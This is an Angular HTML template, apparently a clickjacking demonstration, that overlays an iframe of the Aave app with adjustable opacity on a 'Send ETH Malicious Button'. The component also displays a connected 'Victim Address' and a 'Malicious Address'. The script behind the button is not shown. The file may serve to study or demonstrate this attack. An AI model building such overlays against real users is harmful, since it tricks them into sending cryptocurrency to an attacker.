<main>
  <section class="left">
    <iframe id="aaveIframe" (load)="handleIframeLoad()" [style.opacity]="opacity" src="https://app.aave.com">
    </iframe>

    <button class="supply-eth" *ngIf="supplyEth" (click)="sendEthToTarget()">
      Send ETH Malicious Button
    </button>
  </section>

  <section class="right">
    <!-- <mat-slider min="0" max="1" step="0.1" [(ngModel)]="opacity"></mat-slider> -->

    <div>{{accountConnectedAddress ? ('Connected to Victim Address: ' + accountConnectedAddress) : 'Not Connected'}}</div>
    <div>{{'Malicious Address: ' + targetAddress}}</div>
    <div>{{opacity}}</div>
    <div>{{supplyEth}}</div>
    <div>{{supplyClickCounter}}</div>
  </section>
</main>